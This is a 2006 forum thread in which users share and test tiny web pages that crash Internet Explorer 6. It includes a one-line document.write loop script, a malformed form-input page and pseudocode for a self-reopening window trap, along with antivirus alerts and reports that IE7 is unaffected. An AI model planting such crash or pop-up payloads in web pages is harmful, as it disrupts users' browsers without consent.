Post #266,467
8/31/06 2:48:51 PM
|
Crash IE with a 61 byte web page
[link|http://www.modernlifeisrubbish.co.uk/how-to-crash-internet-explorer.asp|How to Crash Internet Explorer] <script>for (x in document.write) { document.write(x);}</script> Darrell Spice, Jr. Trendy yet complex\nPeople seek me out - though they're not sure why\n[link|http://spiceware.org/gallery/ArtisticOverpass|Artistic Overpass] [link|http://www.spiceware.org/|SpiceWare]
|
Post #266,470
8/31/06 3:04:00 PM
|
I have 2 webpages now...
That do this to IE.
[link|http://www.gregfolkert.net/derail.html|Derail] and [link|http://www.gregfolkert.net/default.html|Default]
It is just amazing.
-- [link|mailto:greg@gregfolkert.net|greg], [link|http://www.iwethey.org/ed_curry|REMEMBER ED CURRY!] @ iwetheyFreedom is not FREE. Yeah, but 10s of Trillions of US Dollars? SELECT * FROM scog WHERE ethics > 0;
0 rows returned.
|
Post #266,476
8/31/06 3:23:06 PM
|
The FORM one's caught by Symantec AntiVirus
Scan type: Auto-Protect Scan
Event: Threat Found!
Threat: Crash.Trojan
File: C:\\Documents and Settings\\sfddspic\\Local Settings\\Temporary Internet Files\\Content.IE5\\C9CEGKFW\\default[1].htm
Location: Quarantine
Computer: SFDW2411
User: sfddspic
Action taken: Quarantine succeeded : Access denied
Date found: Thursday, August 31, 2006 2:21:38 PM Darrell Spice, Jr. Trendy yet complex\nPeople seek me out - though they're not sure why\n[link|http://spiceware.org/gallery/ArtisticOverpass|Artistic Overpass] [link|http://www.spiceware.org/|SpiceWare]
|
Post #266,487
8/31/06 4:44:34 PM
|
Crash Trojan? WTF?
Funny.
So a single line webpage is now a TROJAN.
Wahahaha.
-- [link|mailto:greg@gregfolkert.net|greg], [link|http://www.iwethey.org/ed_curry|REMEMBER ED CURRY!] @ iwetheyFreedom is not FREE. Yeah, but 10s of Trillions of US Dollars? SELECT * FROM scog WHERE ethics > 0;
0 rows returned.
|
Post #266,482
8/31/06 3:46:30 PM
8/31/06 3:46:52 PM
|
dupe - ignore
Darrell Spice, Jr. Trendy yet complex\nPeople seek me out - though they're not sure why\n[link|http://spiceware.org/gallery/ArtisticOverpass|Artistic Overpass] [link|http://www.spiceware.org/|SpiceWare]
Edited by SpiceWare
Aug. 31, 2006, 03:46:52 PM EDT
|
Post #266,575
9/2/06 4:24:05 AM
9/2/06 4:26:22 AM
|
Neither page crashes IE7.
IE7 RC1 on the CS:S box here. (Version 7.0.5700.6)
Peter
[link|http://www.no2id.net/|Don't Let The Terrorists Win]
[link|http://www.kuro5hin.org|There is no K5 Cabal]
[link|http://guildenstern.dyndns.org|Home]
Use P2P for legitimate purposes!
[link|http://kevan.org/brain.cgi?pwhysall|A better terminal emulator]
Edited by pwhysall
Sept. 2, 2006, 04:26:22 AM EDT
|
Post #266,471
8/31/06 3:05:12 PM
|
Wow, dirt-simple concept
How about this (pseudo code, 'cause I'm not going to go look up the real DOM terms): <script>\n var garbage = document.body.text; // throw the text from the body into a variable\n function addGarbage(){\n document.body.text.add('foo'); // write some additional text into the body\n garbage += document.body.text; // append the current body contents to your variable\n addGarbage();\n }\n</script>\n<body onLoad="addGarbage()" onUnload="document.new(garbage)">Basically call a recursive function that keeps appending more and more crap to the body, and if you try to close the browser it opens a new window to keep writing crap. You probably wouldn't even need to add more to the body, just keep filling the variable with ever-increasing junk. Seems pretty easy to do. I wonder how different browsers would deal with it, and if it would be more than an annoyance. This is what happens when people who don't write childishly destructive code for a living see some childishly destructive code. ===
Purveyor of Doc Hope's [link|http://DocHope.com|fresh-baked dog biscuits and pet treats].
[link|http://DocHope.com|http://DocHope.com]
|
Post #266,473
8/31/06 3:07:17 PM
|
Try my two pages.
-- [link|mailto:greg@gregfolkert.net|greg], [link|http://www.iwethey.org/ed_curry|REMEMBER ED CURRY!] @ iwetheyFreedom is not FREE. Yeah, but 10s of Trillions of US Dollars? SELECT * FROM scog WHERE ethics > 0;
0 rows returned.
|
Post #266,481
8/31/06 3:42:50 PM
|
At work? Are you serious?
===
Purveyor of Doc Hope's [link|http://DocHope.com|fresh-baked dog biscuits and pet treats].
[link|http://DocHope.com|http://DocHope.com]
|
Post #266,524
8/31/06 10:21:29 PM
|
The onUnload is evil.
But the rest is basically an explicit - and browser neutral - version of what Spice posted. The flaw in the original is that IE dynamically changes the document object that the for loop sees whilst it is iterating over it. This voliates how closures are supposed to work and is IMO the kind of thing that accounts for many of the JS/DOM bugs in IE.
Wade.
"Insert crowbar. Apply force."
|
Post #266,527
9/1/06 12:20:21 AM
|
Porn site trick, had people freak at the law firm
When I was doing helpdesk, I got a call from the director of marketing. Told me to come up to her office, wouldn't say why. She opened an email, browser windows started popping up, the faster she closed them the faster they came up.
The contents were not work appropriate.
Not knowing the three-finger salute, she powered it down and called me. I calmly fixed her issue, and promised to explain to "anyone who might be looking at log files" that she wasn't really looking at that stuff.
===
Purveyor of Doc Hope's [link|http://DocHope.com|fresh-baked dog biscuits and pet treats].
[link|http://DocHope.com|http://DocHope.com]
|
Post #266,529
9/1/06 8:34:36 AM
|
I have heard of that, now that you mention it.
Even though I will admit to browsing some salacious sites from time-to-time, I forget that people get hit with that nasty trick because I've been using Opera for years (and never used Outlook for internet mail) which has had popup blocking for some while.
Interesting term that: 'work appropriate'. Without giving too much away, I work for a company that needs to research that sort of thing. So we have a Malware network, where this sort of thing is provisionally allowed, and a Corporate network where it is not. I remember in my first few weeks seeing porn on some employee's PCs, plain as day. But, of course, it was connected with researching malware infection sites. So.
Wade.
"Insert crowbar. Apply force."
|
Post #266,475
8/31/06 3:22:56 PM
|
Easier.
I don't know if it still works.
[link|http://z.iwethey.org/forums/render/content/show?contentid=100393|#100393].
Cheers,
Scott.
|
Post #266,544
9/1/06 11:56:10 AM
|
Norton Antivirus catches it, but IE doesn't crash.
I made a simple web page as outlined at the [link|http://www.securityfocus.com/archive/1/319360/2003-04-20/2003-04-26/0|Security Focus] link. The page is: <html>
<form>
<input type crash>
</form>
</html> (Note that it gives a null-pointer exception in everything that uses SHLWAPI.DLL (IE, Frontpage, etc.).) Opening the page with IE gives a Norton AntiVirus Notification popup: Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Trojan.CrashIE
[...] Turning off NAV gives a blank page with no crash, so apparently that bug has been fixed in one of the post 2003 IE updates. FWIW. Cheers, Scott.
|
Post #266,490
8/31/06 5:08:32 PM
|
Didn't do anything to me
6.00.29 yadda yadda sp2 on XP
Too much of today's music is fashionable crap dressed as artistry.Adrian Belew
|
Post #266,511
8/31/06 7:07:35 PM
|
Certainly crashed my IE. XP Media Center w/IE 6.0.29
Of course, I had to actually use IE in the first place to check it.
|
Post #266,576
9/2/06 4:26:08 AM
|
IE7 unaffected.
Peter
[link|http://www.no2id.net/|Don't Let The Terrorists Win]
[link|http://www.kuro5hin.org|There is no K5 Cabal]
[link|http://guildenstern.dyndns.org|Home]
Use P2P for legitimate purposes!
[link|http://kevan.org/brain.cgi?pwhysall|A better terminal emulator]
|
